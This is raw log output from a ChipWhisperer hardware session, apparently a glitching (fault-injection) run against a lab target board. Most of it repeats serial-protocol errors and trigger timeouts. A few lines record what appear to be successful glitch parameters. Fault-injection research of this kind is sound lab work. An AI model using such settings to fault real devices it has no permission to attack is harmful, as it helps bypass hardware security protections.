(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
Trigger still high!
Trigger still high!
CWbytearray(b'01') 46.875 -49.609375 54 🐙CWbytearray(b'01') 46.875 -49.609375 54 🐙
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
CWbytearray(b'01') 46.875 -48.828125 54 🐙CWbytearray(b'01') 46.875 -48.828125 54 🐙
CWbytearray(b'01') 46.875 -48.828125 54 🐙CWbytearray(b'01') 46.875 -48.828125 54 🐙
CWbytearray(b'01') 46.875 -48.828125 54 🐙CWbytearray(b'01') 46.875 -48.828125 54 🐙
CWbytearray(b'01') 46.875 -48.828125 54 🐙CWbytearray(b'01') 46.875 -48.828125 54 🐙
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
CWbytearray(b'01') 46.875 -48.828125 54 🐙
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 08
Timeout - no trigger
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
Trigger still high!
Trigger still high!
Trigger still high!
CWbytearray(b'01') 46.875 -47.65625 55 🐙
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 6
(ChipWhisperer Target ERROR|File SimpleSerial2.py:288) Device reported error 0x3
(ChipWhisperer Target ERROR|File SimpleSerial2.py:290) CWbytearray(b'00 06 06 03 72 01 00 06 06 86 00')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71